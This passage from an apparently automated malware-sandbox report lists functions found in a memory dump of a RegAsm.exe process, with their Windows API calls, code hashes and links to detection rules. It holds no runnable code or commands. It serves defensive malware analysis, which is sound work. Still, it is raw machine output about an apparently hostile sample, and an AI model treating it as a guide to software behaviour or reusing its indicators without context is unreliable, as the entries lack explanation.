                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                  • String ID: JD
                                                                                                                                  • API String ID: 1084509184-2669065882
                                                                                                                                  • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                                                  • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                                                                  • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                                                  • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                                                                  Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID: GetLocaleInfoEx
                                                                                                                                  • API String ID: 2299586839-2904428671
                                                                                                                                  • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                                                                  • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                                                                                  • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                                                                  • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                                                                  Function 00446270 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                                                                                                  • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                                                                                                                  • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                                                                                                  • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                                                                                                                  Function 00451D58 Relevance: 3.2, APIs: 2, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1661935332-0
                                                                                                                                  • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                                                  • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                                                                                  • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                                                  • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                                                                                  Function 004533AB Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004533A6,?,?,00000008,?,?,0045625D,00000000), ref: 004535D8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                  • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                                                                                  • Instruction ID: 7263c04077df6a1dd25da4ac29b5b982fa38ace811980f45f75c7c5cedc24273
                                                                                                                                  • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                                                                                  • Instruction Fuzzy Hash: 0FB13B315106089FD715CF28C48AB657BE0FF053A6F25865DE899CF3A2C339EA96CB44
                                                                                                                                  Function 1000B5C1 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000B5BC,?,?,00000008,?,?,1000B25C,00000000), ref: 1000B7EE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                  • Opcode ID: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                                                                                  • Instruction ID: c899a2dc376e060411cab8954cdd4c29929d9ba6cfa71f030d59b99a2ca162da
                                                                                                                                  • Opcode Fuzzy Hash: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                                                                                  • Instruction Fuzzy Hash: 0DB16B31610A09CFE755CF28C486B647BE0FF453A4F25C658E89ACF2A5C735E982CB40
                                                                                                                                  Function 004339D7 Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                  • Opcode ID: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                                                                                                  • Instruction ID: b5ae8e6f7fa87a7dee9e60626e0a37a25df5f2dd99b83f8da903d7583ecded6c
                                                                                                                                  • Opcode Fuzzy Hash: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                                                                                                  • Instruction Fuzzy Hash: 0C129E727083048BD304DF65D882A1EB7E2BFCC758F15892EF495AB381DA74E915CB86
                                                                                                                                  Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1663032902-0
                                                                                                                                  • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                                                  • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                                                                                  • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                                                  • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                                                                                  Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2692324296-0
                                                                                                                                  • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                                  • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                                                                  • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                                  • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                                                                  Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                                                                  • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                  • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                                                  • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                                                                                  • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                                                  • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                                                                                  Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1084509184-0
                                                                                                                                  • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                                  • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                                                                  • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                                  • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                                                                  Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                  • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                                                  • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                                                  Function 00427AD7 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                  • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                                                                                  • Instruction ID: bbd91956ea41f9089fdf4ea26de33e0e8d132f349ea16d9e77f48d305cf446da
                                                                                                                                  • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                                                                                  • Instruction Fuzzy Hash: F1412975A183558FC340CF29D58020AFBE1FFC8318F645A1EF889A3350D379E9428B86
                                                                                                                                  Function 10017194 Relevance: .8, Instructions: 751COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                                  • Instruction ID: 44f99013a838546abf86f75096a930c39f9ce457c7277da91ad5f6740c4fb7fb
                                                                                                                                  • Opcode Fuzzy Hash: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                                  • Instruction Fuzzy Hash: 89628C316083958FD324DF28C48469ABBF1FF85384F154A2DE9E98B391E771D989CB42
                                                                                                                                  Function 0044DA49 Relevance: .6, Instructions: 637COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                                                                                                  • Instruction ID: 4200599dcb49c21c1ca78238ad82984ca11e49a574bdd01b256a4bdf4e559873
                                                                                                                                  • Opcode Fuzzy Hash: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                                                                                                  • Instruction Fuzzy Hash: D2322521D69F414DE7239A35CC22336A24CBFB73C5F15D737E81AB5AAAEB29C4834105
                                                                                                                                  Function 0041F18B Relevance: .6, Instructions: 598COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                                                                                                                  • Instruction ID: 06c66d0f35fb266b7f69fbfce4f1f639eb17408d85dd7e5468211ecdc8378744
                                                                                                                                  • Opcode Fuzzy Hash: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                                                                                                                  • Instruction Fuzzy Hash: 7932C2716087459BC715DF28C4807ABB7E5BF84318F040A3EF89587392D779D98ACB8A
                                                                                                                                  Function 0042742E Relevance: .4, Instructions: 435COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                                                                                                                  • Instruction ID: b033fe34555866f616fd3cc64b543b740d9cc82fbf2d17309ab2a27531c6336b
                                                                                                                                  • Opcode Fuzzy Hash: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                                                                                                                  • Instruction Fuzzy Hash: 6C02CEB17046528BC358CF2EEC5053AB7E1AB8D311744863EE495C7781EB35FA22CB94
                                                                                                                                  Function 00426E9F Relevance: .4, Instructions: 383COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                                                                                                                  • Instruction ID: 06b531cc06dcd57701b547059d2c567c45bbe225ee7d26ac7aed84b394be02a5
                                                                                                                                  • Opcode Fuzzy Hash: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                                                                                                                  • Instruction Fuzzy Hash: 2DF19D716142558FC348CF1DE8A187BB3E1FB89311B450A2EF582C3391DB79EA16CB56
                                                                                                                                  Function 00437DB3 Relevance: .3, Instructions: 345COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
